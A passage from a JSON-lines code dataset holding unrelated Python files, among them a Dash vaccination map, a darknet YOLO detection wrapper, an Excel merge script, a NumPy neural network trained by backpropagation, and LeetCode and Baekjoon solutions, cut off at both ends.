print(n1_float/n2_float)\n\n ######\n sair= input('Sair?[s]').lower().startswith('s')\n \n if sair is True:\n break","repo_name":"Alesfjr/curso_python","sub_path":"calculadora/caculatorWHILE.PY","file_name":"caculatorWHILE.PY","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4685943665","text":"import dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport claudio_funcoes_usage as cv # function usage geral\nimport pandas as pd\n#from .barras_fx_etaria import barras_fx_etaria, barras_sub_plot_vacina\n#maps\nimport plotly.express as px # plot dynamic\nimport datetime # time\nimport statistics # function statistics\nimport json\nfrom urllib.request import urlopen\nimport pandas as pd\nimport numpy\n\ndef read_data():\n \"\"\"Read data\"\"\"\n #filtered.csv': paciente_datanascimento;paciente_enumsexobiologico;paciente_racacor_codigo;paciente_endereco_uf;vacina_grupoatendimento_codigo;vacina_dataaplicacao;vacina_descricao_dose;vacina_codigo\n dados = cv.arquivo_para_corpus_delimiter(f'dataset/vacinaOpenDataSUS/filtered.csv', ';', 1000) # arquivo com os dados \n grupo_categoria = cv.arquivo_para_corpus_delimiter(f'dataset/vacinaOpenDataSUS/grupo-categoria.csv', ';') # 4 vacina_grupoatendimento_codigo[ vacina_grupoatendimento_codigo;vacina_grupoatendimento_nome;vacina_categoria_nome ]\n #grupo = cv.arquivo_para_corpus_delimiter(f'dataset/vacinaOpenDataSUS/grupo.csv', ';')\n raca = cv.arquivo_para_corpus_delimiter(f'dataset/vacinaOpenDataSUS/raca.csv', ';') # paciente_racacor_codigo, 2\n tipos_vacina = cv.arquivo_para_corpus_delimiter(f'dataset/vacinaOpenDataSUS/vacina.csv', ';') # vacina_codigo 7\n \n vacinas_estado = dict()\n for index in range(1,len(dados)): \n age = int( ( datetime.datetime.today() - datetime.datetime.strptime(dados[index][0], '%Y-%m-%d')).days / 365.25 )\n if vacinas_estado.get( dados[index][3] ) == None: \n vacinas_estado[ dados[index][3] ] = {'qtd' : 0, 'age' : [] }\n vacinas_estado[ dados[index][3] ] ['qtd'] +=1 # estado \n vacinas_estado[ dados[index][3] ] ['age'].append(age) # idade \n \n vacinas_estado = cv.remove_key_dict(vacinas_estado, 'XX'); vacinas_estado = cv.remove_key_dict(vacinas_estado, 'paciente_endereco_uf') \n for k in vacinas_estado: \n vacinas_estado[k]['age_media'] = statistics.mean( vacinas_estado[k]['age'] ) \n vacinas_estado[k]['age_median'] = statistics.median( vacinas_estado[k]['age'] ) \n vacinas_estado[k]['age_histogram'] = numpy.histogram(vacinas_estado[k]['age'], bins=10) \n \n dados = {'sigla': list(vacinas_estado.keys()), 'média idade' : [vacinas_estado[k]['age_media'] for k in vacinas_estado],\n 'mediana idade' : [vacinas_estado[k]['age_median'] for k in vacinas_estado],\n 'age_histogram' : [vacinas_estado[k]['age_histogram'] for k in vacinas_estado]}\n dados = pd.DataFrame(dados ) \n brasil = json.load(open( 'dataset/mapa_brasil'))\n \n nomes = []\n sigla_nome = {}\n for feature in brasil['features']: \n feature['id'] = feature['properties']['sigla'] \n #nomes.append( feature['properties']['name'] )\n sigla_nome [ feature['properties']['sigla'] ] = feature['properties']['name'] \n \n nomes_ordem = [] \n for d in dados['sigla']:\n #print(d)\n nomes_ordem.append(sigla_nome[d])\n dados['Nome'] = nomes_ordem\n \n #nomes_estados = ['Acre','Alagoas','Amazonas','Amapá','Bahia','Ceará','Espírito Santo','Goiás','Maranhão','Minas Gerais','Mato Grosso do Sul','Mato Grosso','Pará','Paraíba','Pernambuco','Piauí' ,'Paraná','Rio de Janeiro','Rio Grande do Norte','Rondônia','Roraima','Rio Grande do Sul','Santa Catarina', 'Sergipe', 'São Paulo', 'Tocantins', 'Distrito Federal']\n \n #dados['nomes'] = nomes\n #print(dados)\n \n #print(dados['nomes'])\n #print(dados['sigla'])\n \n fig = px.choropleth(\n dados,\n locations='sigla',\n geojson = brasil,\n color='média idade',\n hover_data=['Nome', 'mediana idade'],\n scope='south america'\n ) \n return fig\n #fig.show()\n \n #fig = px.bar(x=list(vacinas_estado.keys()), y=[vacinas_estado[k]['qtd'] for k in vacinas_estado]) \n #fig.update_layout(xaxis_title='Estados', yaxis_title='Quantidade de vacinas')\n #fig.show() \n #fig.write_html(\"html/mapa.html\")\n\n\n\ndef graficos_valiense(app):\n \n return read_data() \n\n components_html = []\n\n #components_html.append(grafico_total_vacinas_idade(app))\n \n #components_html.append(grafico_sub_plot_vacinas_idade(app))\n components_html.append( read_data() )\n\n return components_html","repo_name":"claudiovaliense/visualizacao_covid","sub_path":"valiense/graficos_valiense.py","file_name":"graficos_valiense.py","file_ext":"py","file_size_in_byte":4439,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6409265323","text":"# -*- coding: utf-8 -*-\n# @Time : 2019-10-15 16:40\n# @Author : Yan An\n# @Contact: an.yan@intellicold.ai\n\nfrom __future__ import print_function\n\nimport os\nimport cv2\nimport time\nimport pynvml\nimport random\nimport argparse\nimport numpy as np\n\nfrom utils import *\nfrom ctypes import *\nfrom tqdm import tqdm\n\ndef sample(probs):\n s = sum(probs)\n probs = [a/s for a in probs]\n r = random.uniform(0, 1)\n for i in range(len(probs)):\n r = r - probs[i]\n if r <= 0:\n return i\n return len(probs)-1\n\n\ndef c_array(ctype, values):\n arr = (ctype*len(values))()\n arr[:] = values\n return arr\n\n\nclass BOX(Structure):\n _fields_ = [(\"x\", c_float),\n (\"y\", c_float),\n (\"w\", c_float),\n (\"h\", c_float)]\n\n\nclass DETECTION(Structure):\n _fields_ = [(\"bbox\", BOX),\n (\"classes\", c_int),\n (\"prob\", POINTER(c_float)),\n (\"mask\", POINTER(c_float)),\n (\"objectness\", c_float),\n (\"sort_class\", c_int)]\n\n\nclass IMAGE(Structure):\n _fields_ = [(\"w\", c_int),\n (\"h\", c_int),\n (\"c\", c_int),\n (\"data\", POINTER(c_float))]\n\n\nclass METADATA(Structure):\n _fields_ = [(\"classes\", c_int),\n (\"names\", POINTER(c_char_p))]\n\n\nlib = CDLL(\"./darknet/libdarknet.so\", RTLD_GLOBAL)\nlib.network_width.argtypes = [c_void_p]\nlib.network_width.restype = c_int\nlib.network_height.argtypes = [c_void_p]\nlib.network_height.restype = c_int\n\npredict = lib.network_predict\npredict.argtypes = [c_void_p, POINTER(c_float)]\npredict.restype = POINTER(c_float)\n\nset_gpu = lib.cuda_set_device\nset_gpu.argtypes = [c_int]\n\nmake_image = lib.make_image\nmake_image.argtypes = [c_int, c_int, c_int]\nmake_image.restype = IMAGE\n\nget_network_boxes = lib.get_network_boxes\nget_network_boxes.argtypes = [c_void_p, c_int, c_int, c_float, c_float, POINTER(c_int), c_int, POINTER(c_int)]\nget_network_boxes.restype = POINTER(DETECTION)\n\nmake_network_boxes = lib.make_network_boxes\nmake_network_boxes.argtypes = [c_void_p]\nmake_network_boxes.restype = POINTER(DETECTION)\n\nfree_detections = lib.free_detections\nfree_detections.argtypes = [POINTER(DETECTION), c_int]\n\nfree_ptrs = lib.free_ptrs\nfree_ptrs.argtypes = [POINTER(c_void_p), c_int]\n\nnetwork_predict = lib.network_predict\nnetwork_predict.argtypes = [c_void_p, POINTER(c_float)]\n\nreset_rnn = lib.reset_rnn\nreset_rnn.argtypes = [c_void_p]\n\nload_net = lib.load_network\nload_net.argtypes = [c_char_p, c_char_p, c_int]\nload_net.restype = c_void_p\n\ndo_nms_obj = lib.do_nms_obj\ndo_nms_obj.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]\n\ndo_nms_sort = lib.do_nms_sort\ndo_nms_sort.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]\n\nfree_image = lib.free_image\nfree_image.argtypes = [IMAGE]\n\nletterbox_image = lib.letterbox_image\nletterbox_image.argtypes = [IMAGE, c_int, c_int]\nletterbox_image.restype = IMAGE\n\nload_meta = lib.get_metadata\nlib.get_metadata.argtypes = [c_char_p]\nlib.get_metadata.restype = METADATA\n\nload_image = lib.load_image_color\nload_image.argtypes = [c_char_p, c_int, c_int]\nload_image.restype = IMAGE\n\nrgbgr_image = lib.rgbgr_image\nrgbgr_image.argtypes = [IMAGE]\n\npredict_image = lib.network_predict_image\npredict_image.argtypes = [c_void_p, IMAGE]\npredict_image.restype = POINTER(c_float)\n\nndarray_image = lib.ndarray_to_image\nndarray_image.argtypes = [POINTER(c_ubyte), POINTER(c_long), POINTER(c_long)]\nndarray_image.restype = IMAGE\n\n\ndef nparray_to_image(img):\n data = img.ctypes.data_as(POINTER(c_ubyte))\n image = ndarray_image(data, img.ctypes.shape, img.ctypes.strides)\n return image\n\n\ndef yolo_detect(net, meta, image, thresh=.5, hier_thresh=.1, nms=.45):\n im = nparray_to_image(image)\n num = c_int(0)\n pnum = pointer(num)\n predict_image(net, im)\n dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum)\n num = pnum[0]\n if (nms): do_nms_obj(dets, num, meta.classes, nms);\n\n res = []\n for j in range(num):\n for i in range(meta.classes):\n if dets[j].prob[i] > 0:\n b = dets[j].bbox\n res.append((meta.names[i], dets[j].prob[i], (b.x, b.y, b.w, b.h)))\n res = sorted(res, key=lambda x: -x[1])\n\n free_image(im)\n free_detections(dets, num)\n return res\n\ndef main(args):\n gpu_id = c_int(args.gpu_id)\n set_gpu(gpu_id)\n\n info = load_dict()\n\n input_size = info['input_size']\n yolo_net = load_net(('./darknet/cfg/yolov3-' + str(input_size) + '_test.cfg').encode(),\n ('./darknet/backup/yolov3-' + str(input_size) + '.backup').encode(), 0)\n meta = load_meta(b'./darknet/cfg/voc.data')\n print('Finished loading model!')\n\n labels = [x for x in info['classes'].keys()]\n\n f = open('./darknet/dataset/valid.txt')\n test_picures_path = f.readlines()\n\n resumes = []\n for picture in tqdm(test_picures_path):\n picture = picture.replace('\\n', '')\n\n txt_name = picture.split('/')[-1].replace('jpg','txt')\n f2 = open('results_txt/' + txt_name, 'w', encoding = 'utf-8')\n image = cv2.imread(picture)\n begin = time.time()\n yolo_dets = yolo_detect(yolo_net, meta, image)\n resume = time.time() - begin\n resumes.append(resume)\n FPS = 1/(sum(resumes)/len(resumes))\n print('FPS: ',FPS)\n\n # visulization\n person_boxes = []\n\n for i, det in enumerate(yolo_dets):\n flag = True\n box = det[2]\n cx, cy, w, h = np.array(box)\n x1 = cx - w / 2\n y1 = cy - h / 2\n x2 = cx + w / 2\n y2 = cy + h / 2\n label = det[0].decode()\n index = labels.index(label)\n f2.write(str(index) + ' ' + str(int(x1 + 0.5)) + ' ' + str(int(y1 + 0.5)) + ' ' + str(int(x2 + 0.5)) + ' ' + str(int(y2 + 0.5)) + '\\n')\n if args.save_pic:\n cv2.rectangle(image,(int(x1),int(y1)),(int(x2),int(y2)),(0,255,0),2)\n cv2.putText(image,label,(int(x1), int(y1) - 10),cv2.FONT_HERSHEY_SIMPLEX,2,(0, 0, 255), 2)\n if args.save_pic:\n cv2.imwrite('results/'+picture.split('/')[-1],image)\n f.close()\n write_dict('FPS', int(FPS))\n\n GPU_type, GPU_used = get_gpu_info(args.gpu_id)\n write_dict('GPU_type: ',GPU_type)\n write_dict('GPU_used: ',str(int(GPU_used)) + 'M')\n \n\nif __name__ == '__main__':\n print('detecting...')\n parser = argparse.ArgumentParser('detect images')\n parser.add_argument(\"--gpu_id\", type=int, default=0, help=\"which gpu to use\")\n parser.add_argument(\"--save_pic\", type=bool, default=False, help=\"whether pic to save\")\n arguments = parser.parse_args()\n main(args=arguments)\n\n\n\n\n","repo_name":"isyanan1024/YOLOV3","sub_path":"detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":6710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22207102638","text":"import pandas as pd\nimport streamlit as st\n\ndata_df = pd.DataFrame(\n {\n \"widgets\": [\"st.selectbox\", \"st.number_input\", \"st.text_area\", \"st.button\"],\n }\n)\n\nst.dataframe(\n data_df,\n column_config={\n \"widgets\": st.column_config.Column(\n width=\"medium\"\n )\n }\n)\n","repo_name":"streamlit/st-issues","sub_path":"issues/gh-6879/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"23356407829","text":"import os\nfrom openpyxl import load_workbook, Workbook\nfrom openpyxl.utils import get_column_letter\n\n\ntweets = load_workbook(\"/Users/USER/FILE/EXCEL_FILE.xlsx\",data_only=True)\ntweetsWS = tweets[\"Sheet1\"]\n\ncheckingSamples = load_workbook(\"/Users/USER/FILE/EXCEL_FILE#2w.xlsx\",data_only=True)\ncheckingSamplesWS = checkingSamples[\"BR\"]\n\nWB = Workbook()\nWS = WB.active\n\n# create 2D lists to hold cell data\nrowtweets = []\nrowSamples = []\n\n# append cell data to lists\nfor row in range(1,58649):\n columnData = []\n for col in range(1,8):\n char = get_column_letter(col)\n columnData.append(tweetsWS[char+str(row)].value)\n rowtweets.append(columnData)\n\nfor row in range(1,148):\n CheckingData = []\n for col in range(1,4):\n char = get_column_letter(col)\n CheckingData.append(checkingSamplesWS[char+str(row)].value)\n rowSamples.append(CheckingData)\n\n# merge data between two files\nfor i in rowtweets:\n for k in rowSamples:\n if str(i[0]) == str(k[2]):\n i[5] = k[0]\n\n\n# print the new cell data into excel file\nfor b in range(0,len(rowtweets),1):\n WS.append(rowtweets[b])\nWB.save(\"Vinies Tweets.xlsx\")\n","repo_name":"xanderrp2/RandomPractice","sub_path":"Lab_merger_crude.py","file_name":"Lab_merger_crude.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73830166247","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Modelo para o Sensor CEI\n# \n# Este dataset **\"DataCEI.csv\"** possui informações dispostas em colunas sobre as características dos objetos que passam pelo sensor:\n# \n# * **Tamanho**: Segue a classificação do CEI2020 (Tamanho='0' - Grande 100%).\n# * **Referencia**: Referência dinâmica do *Threshold.\n# * **NumAmostra**: Número de amostras adquiridas.\n# * **Area**: Somatório das Amplitudes das amostras.\n# * **Delta**: Máxima Amplitude da amostra.\n# * **Output1**: Peça tipo 1.\n# * **Output2**: Peça tipo 2.\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n#get_ipython().run_line_magic('matplotlib', 'inline')\n\n#Função do cáculo da sigmóide\ndef sigmoid(x):\n return 1/(1+np.exp(-x))\n\n\n# Carregando os dados\n# Vamos começar lendo o arquivo DataCEI.csv em um dataframe do pandas.\nDataSet=pd.read_csv('arruela_.csv')\nDataSet.head()\nDataSet.drop(['Hora','Tamanho','Referencia'],axis=1,inplace=True)\nDataSet.head()\nDataSet.describe()\n\n# ### Váriaveis do *Dataset*\n\nDataSet.columns\n# ### Número de Peças\n# \n# #### Vamos classificar os grupos pelo número de peças: \n# 1. Grupo com uma peça\n# 2. Grupo com duas peças\nsns.set_style('whitegrid')\nsns.countplot(x='Output2',data=DataSet,palette='RdBu_r')\nplt.show()\n\n# #### Gráfico da distribuição das áreas das peças\n\nsns.distplot(DataSet['Area'].dropna(),kde=False,color='darkred',bins=30)\nplt.show()\n\nsns.set_style('whitegrid')\nsns.countplot(x='Area',hue='Output2',data=DataSet,palette='rainbow')\nplt.show()\n\nsns.set_style('whitegrid')\nsns.countplot(x='NumAmostra',hue='Output2',data=DataSet,palette='rainbow')\nplt.show()\n\n\nsns.set_style('whitegrid')\nsns.countplot(x='Delta',hue='Output1',data=DataSet,palette='rainbow')\nplt.show()\n\n# ## As variáveis preditoras e a variável de resposta\n# \n# Para treinar o modelo de regressão, primeiro precisaremos dividir nossos dados em uma matriz **X** que contenha os dados das variáveis preditoras e uma matriz **y** com os dados da variável de destino.\n# \n# ### Matrizes X e y\n\n#X = DataSet[[ 'NumAmostra', 'Area', 'Delta']]\n#y = DataSet[['Output1','Output2']]\n\n# ### Relação entre as variáveis preditoras\n# \n# #### Algumas questões importantes\n# 1. Pelo menos um dos preditores ***x1, x2, ... ,x5*** é útil na previsão da resposta?\n# 2. Todos os preditores ajudam a explicar **y**, ou apenas um subconjunto dos preditores?\n# 3. Quão bem o modelo se ajusta aos dados?\n# 4. Dado um conjunto de valores de previsão, quais valores de resposta devemos prever e quais as métricas indicam um bom modelo de previsão?\n# \n# **Gráficos simples de dispersão**\n# \n# Pelos gráficos abaixo percebemos ... nossa variável de resposta\nsns.pairplot(DataSet)\nplt.show()\n\n\n# **Mapa de Calor**\n# \n# O gráfico abaixo mostra através de uma escala de cores a correlação entre as variáveis do *Dataset*. Se observarmos as cores deste gráfico, a variável preditora **'Area'** possui maior correlação com a variável de resposta **'Output'** e a variável **'NumAmostra'** a menor.\n\nsns.heatmap(DataSet.corr())\nplt.show()\n\n\n# ## Normalização dos Dados\n\nfrom sklearn.preprocessing import StandardScaler\nscaler=StandardScaler()\nDataScaled=scaler.fit_transform(DataSet)\nDataSetScaled=pd.DataFrame(np.array(DataScaled),columns = ['NumAmostra', 'Area', 'Delta', 'Output1','Output2'])\n\nDataSetScaled.head()\n\nX = DataSetScaled.drop(['Output1', 'Output2'],axis=1)\ny = DataSet[['Output1','Output2']]\n\n\n# ## Separando os dados de treinamento e de validação\n# \n# Agora vamos dividir os dados em um conjunto de treinamento e um conjunto de testes. Vamos treinar o modelo no conjunto de treinamento, em seguida, usar o conjunto de teste para validar o modelo.\n# \n# Em nosso exemplo iremos separar de forma randômica 33% dos dados para validação. Estes dados não serão utilizados para determinação dos coeficientes preditores do modelo. \n# \n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.29, random_state=3)\n\nprint(y_test)\nprint(X_test)\n# ## Criando o Modelo de MPL\n\n\n#Tamanho do DataSet de Treinamento\nn_records, n_features = X_train.shape\n\n#Arquitetura da MPL\nN_input = 3\nN_hidden = 8\nN_output = 2\nlearnrate = 0.1\n# ## Inicialização dos pesos da MPL (Aleatório)\n\n#Pesos da Camada Oculta (Inicialização Aleatória)\nweights_input_hidden = np.random.normal(0, scale=0.1, size=(N_input, N_hidden))\nprint('Pesos da Camada Oculta:')\nprint(weights_input_hidden)\n\n#Pesos da Camada de Saída (Inicialização Aleatória)\nweights_hidden_output = np.random.normal(0, scale=0.1, size=(N_hidden, N_output))\nprint('Pesos da Camada de Saída:')\nprint(weights_hidden_output)\n\n\n# ## Algoritmo Backpropagation\n\nepochs = 50000\nlast_loss=None\nEvolucaoError=[]\nIndiceError=[]\n\nfor e in range(epochs):\n delta_w_i_h = np.zeros(weights_input_hidden.shape)\n delta_w_h_o = np.zeros(weights_hidden_output.shape)\n for xi, yi in zip(X_train.values, y_train.values):\n \n# Forward Pass\n #Camada oculta\n #Calcule a combinação linear de entradas e pesos sinápticos\n hidden_layer_input = np.dot(xi, weights_input_hidden)\n #Aplicado a função de ativação\n hidden_layer_output = sigmoid(hidden_layer_input)\n \n #Camada de Saída\n #Calcule a combinação linear de entradas e pesos sinápticos\n output_layer_in = np.dot(hidden_layer_output, weights_hidden_output)\n\n #Aplicado a função de ativação \n output = sigmoid(output_layer_in)\n #print('As saídas da rede são',output)\n#------------------------------------------- \n \n# Backward Pass\n ## TODO: Cálculo do Erro\n error = yi - output\n \n # TODO: Calcule o termo de erro de saída (Gradiente da Camada de Saída)\n output_error_term = error * output * (1 - output)\n\n # TODO: Calcule a contribuição da camada oculta para o erro\n hidden_error = np.dot(weights_hidden_output,output_error_term)\n \n # TODO: Calcule o termo de erro da camada oculta (Gradiente da Camada Oculta)\n hidden_error_term = hidden_error * hidden_layer_output * (1 - hidden_layer_output)\n \n # TODO: Calcule a variação do peso da camada de saída\n delta_w_h_o += output_error_term*hidden_layer_output[:, None]\n\n # TODO: Calcule a variação do peso da camada oculta\n delta_w_i_h += hidden_error_term * xi[:, None]\n \n #Atualização dos pesos na época em questão\n weights_input_hidden += learnrate * delta_w_i_h / n_records\n weights_hidden_output += learnrate * delta_w_h_o / n_records\n \n \n # Imprimir o erro quadrático médio no conjunto de treinamento\n \n if e % (epochs / 20) == 0:\n hidden_output = sigmoid(np.dot(xi, weights_input_hidden))\n out = sigmoid(np.dot(hidden_output,\n weights_hidden_output))\n loss = np.mean((out - yi) ** 2)\n\n if last_loss and last_loss < loss:\n print(\"Erro quadrático no treinamento: \", loss, \" Atenção: O erro está aumentando\")\n else:\n print(\"Erro quadrático no treinamento: \", loss)\n last_loss = loss\n \n EvolucaoError.append(loss)\n IndiceError.append(e)\n\n### Gráfico da Evolução do Erro\n\n\nplt.plot(IndiceError, EvolucaoError, 'r') # 'r' is the color red\nplt.xlabel('')\nplt.ylabel('Erro Quadrático')\nplt.title('Evolução do Erro no treinamento da MPL')\nplt.show()\n\n\n# ## Validação do modelo\n\n# Calcule a precisão dos dados de teste\nn_records, n_features = X_test.shape\npredictions=0\n\nfor xi, yi in zip(X_test.values, y_test.values):\n\n# Forward Pass\n #Camada oculta\n #Calcule a combinação linear de entradas e pesos sinápticos\n hidden_layer_input = np.dot(xi, weights_input_hidden)\n #Aplicado a função de ativação\n hidden_layer_output = sigmoid(hidden_layer_input)\n \n #Camada de Saída\n #Calcule a combinação linear de entradas e pesos sinápticos\n output_layer_in = np.dot(hidden_layer_output, weights_hidden_output)\n\n #Aplicado a função de ativação \n output = sigmoid(output_layer_in)\n\n#------------------------------------------- \n \n#Cálculo do Erro da Predição\n ## TODO: Cálculo do Erro \n if (output[0]>output[1]):\n if (yi[0]>yi[1]):\n predictions+=1\n \n if (output[1]>=output[0]):\n if (yi[1]>yi[0]):\n predictions+=1\n\nprint(\"A Acurácia da Predição é de: {:.3f}\".format(predictions/n_records))\n ","repo_name":"darlanSchmitz25/IA","sub_path":"0.921.py","file_name":"0.921.py","file_ext":"py","file_size_in_byte":8664,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72070837287","text":"# 给你一个只包含 '(' 和 ')' 的字符串,找出最长有效(格式正确且连续)括号子串的长度。 \n# \n# \n# \n# \n# \n# 示例 1: \n# \n# \n# 输入:s = \"(()\"\n# 输出:2\n# 解释:最长有效括号子串是 \"()\"\n# \n# \n# 示例 2: \n# \n# \n# 输入:s = \")()())\"\n# 输出:4\n# 解释:最长有效括号子串是 \"()()\"\n# \n# \n# 示例 3: \n# \n# \n# 输入:s = \"\"\n# 输出:0\n# \n# \n# \n# \n# 提示: \n# \n# \n# 0 <= s.length <= 3 * 10⁴ \n# s[i] 为 '(' 或 ')' \n# \n# \n# \n# 👍 1785 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def longestValidParentheses(self, s: str) -> int:\n \"\"\"\n 方法1:动态规划\n 思路:最值问题,思考用动态规划去解决。\n 定义dp:dp[i]表示以下标i结尾的最长有效子串长度。\n base case:\n 分析:when s[i] is '(', s[i] not in subs, so dp[i] = 0\n when s[i] is ')', should look s[i-1]:\n if s[i-1] is '(', then dp[i] = dp[i-2] + 2\n if s[i-1] is ')', if s[i-dp[i-1]-1] is '(', then dp[i] = dp[i-1] + 2 + dp[i-dp[i-1]-2]\n \"\"\"\n if not s:\n return 0\n n = len(s)\n dp = [0 for _ in range(n)]\n\n for i in range(1, n):\n if s[i] == ')':\n if s[i-1] == '(':\n dp[i] = dp[i-2] + 2 if i > 1 else 2\n elif s[i-1] == ')':\n if i-dp[i-1] > 0 and s[i-dp[i-1]-1] == '(':\n if i - dp[i-1] >= 2:\n dp[i] = dp[i-1] + 2 + dp[i-dp[i-1]-2]\n else:\n dp[i] = dp[i-1] + 2\n\n return max(dp)\n# leetcode submit region end(Prohibit modification and deletion)\n\n\nif __name__ == '__main__':\n # s = \"(()\"\n s = \")()())\"\n result = Solution().longestValidParentheses(s)\n print(result)\n","repo_name":"zh805/algorithm","sub_path":"leetcode/python/leetcode/editor/cn/[32]最长有效括号.py","file_name":"[32]最长有效括号.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41117560602","text":"\n# reading data\nsource = open('source.txt', 'r')\n\n# writing data\noutput = open('output.txt', 'w')\n\n\ndef fibonacci_sequence(source, output):\n # getting data from source\n source_data = source.read().splitlines()\n source.close()\n\n # getting line indexes from source\n line_indexes = [source_data.index(i) + 1 for i in source_data]\n first_element = second_element = line_indexes[0]\n counter_value = 2\n\n sequence_elements = [first_element]\n\n for i in range(line_indexes[0], line_indexes[6]):\n # code for fibonacci sequence\n while counter_value < line_indexes.index(i) + 1:\n\n elements_sum = first_element + second_element\n first_element = second_element\n second_element = elements_sum\n counter_value += 1\n # adding fibonacci sequence to list\n sequence_elements.append(elements_sum)\n\n # checking for right index between sequence_elements and source_data\n for i in source_data:\n\n for element in sequence_elements:\n\n if source_data.index(i) == element-1:\n # reverse and writing data in output.txt\n output.write(i[::-1] + '\\n')\n\n output.close()\n\n return 'Data loaded successfully!'\n\n\nprint(fibonacci_sequence(source, output))\n","repo_name":"MrFlava/justforfun","sub_path":"Sparkybit_test_task-master/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35748549151","text":"'''\nhttps://boj.kr/20057\n'''\nimport sys\ninput = sys.stdin.readline\n\nN = int(input())\nleft = [(-1,-1,0.1),(1,-1,0.1),(-1,0,0.07),(1,0,0.07),(-1,1,0.01),(1,1,0.01),(0,-2,0.05),(-2,0,0.02),(2,0,0.02),(0,-1,0)]\nright = [(y,-x,z) for y,x,z in left]\ndown = [(-x,y,z) for y,x,z in left]\nup = [(x,y,z) for y,x,z in left]\n\ngrid = []\nfor _ in range(N):\n row = list(map(int,input().split()))\n grid.append(row)\n\ndef solve(cnt,dy,dx,tornado_dr):\n global res, curr_y, curr_x\n\n for _ in range(cnt):\n curr_y += dy\n curr_x += dx\n total = 0\n for _dy,_dx,ratio in tornado_dr:\n ny = curr_y + _dy\n nx = curr_x + _dx\n if ratio == 0:\n new_sand = grid[curr_y][curr_x] - total\n else:\n new_sand = int(grid[curr_y][curr_x] * ratio)\n total += new_sand\n if 0 <= ny < N and 0 <= nx < N:\n grid[ny][nx] += new_sand\n else:\n res += new_sand\n\ncurr_y,curr_x = N//2,N//2\nres = 0\nfor i in range(1,N+1):\n if i == N:\n solve(i-1,0,-1,left)\n break\n if i % 2 != 0:\n solve(i,0,-1,left)\n solve(i,1,0,down)\n else:\n solve(i,0,1,right)\n solve(i,-1,0,up)\n\nprint(res)","repo_name":"jihoonyou/problem-solving-2","sub_path":"boj/samsung/20057_마법사 상어와 토네이도.py","file_name":"20057_마법사 상어와 토네이도.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8843900932","text":"#! /usr/bin/env python\n\nimport uvmf_gen\n\n## The input to this call is the name of the desired interface\nintf = uvmf_gen.InterfaceClass('jkl')\n\n## Specify the clock and reset signal for the interface\nintf.clock = 'pjClk'\nintf.reset = 'pjRst'\n\n## Specify the ports associated with this interface.\n## addPort(,,[input|output|inout])\nintf.addPort('jkl_wdata',8,'input')\nintf.addPort('jkl_addr',16,'input')\nintf.addPort('jkl_rdata',8,'output')\n\n## Specify transaction variables for the interface.\n## addTransVar(,)\n## optionally can specify if this variable may be specified as 'rand'\nintf.addTransVar('jkl_trnVar1','byte',isrand=False)\nintf.addTransVar('jkl_trnVar2','int',isrand=True)\nintf.addTransVar('jkl_trnVar3','bit [15:0]',isrand=False)\n\n## Specify configuration variables for the interface.\n## addConfigVar(,)\n## optionally can specify if this variable may be specified as 'rand'\nintf.addConfigVar('jkl_cfgVar1','bit',isrand=False)\nintf.addConfigVar('jkl_cfgVar2','int',isrand=True)\nintf.addConfigVar('jkl_cfgVar3','bit [3:0]',isrand=False)\n\n## Set to 'True' if you want this interface code to be Veloce ready,\n## otherwise don't set or set to 'False'\nintf.veloceReady = True\n\n## This will prompt the creation of all interface files in their specified\n## locations\nintf.create()\n","repo_name":"muneeb-mbytes/UVMF","sub_path":"UVM_Framework/UVMF_3.6c/templates/python/examples/multi_file/jkl_if_config.py","file_name":"jkl_if_config.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"30003403170","text":"import os\nimport re\nimport sys\nimport django\nfrom datetime import datetime\nimport ffmpeg\n\n# Set up Django's settings\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ArgusAPI.settings')\ndjango.setup()\n\nfrom API.models import Video\nfrom ArgusAPI.settings import STORAGE_ROOT\n\ndef VideoMeta():\n folder_path = STORAGE_ROOT+\"/files\"\n for file_name in os.listdir(folder_path):\n if file_name.endswith(\".mp4\") or file_name.endswith(\".mov\") or file_name.endswith(\".avi\") or file_name.endswith(\".mkv\"):\n file_path = os.path.join(folder_path, file_name)\n\n # Retrieve video thumbnail\n thumbnail_path = f\"{file_name}.jpg\"\n # thumbnail_path = os.path.join(folder_path, thumbnail_filename)\n # ffmpeg.input(file_path).output(thumbnail_path, vframes=1).run()\n \n # video info\n probe = ffmpeg.probe(file_path)\n video_stream = next((stream for stream in probe['streams'] if stream['codec_type'] == 'video'), None)\n audio_stream = next((stream for stream in probe['streams'] if stream['codec_type'] == 'audio'), None)\n file_size = os.path.getsize(file_path)\n file_type = video_stream.get(\"codec_name\")\n date_created 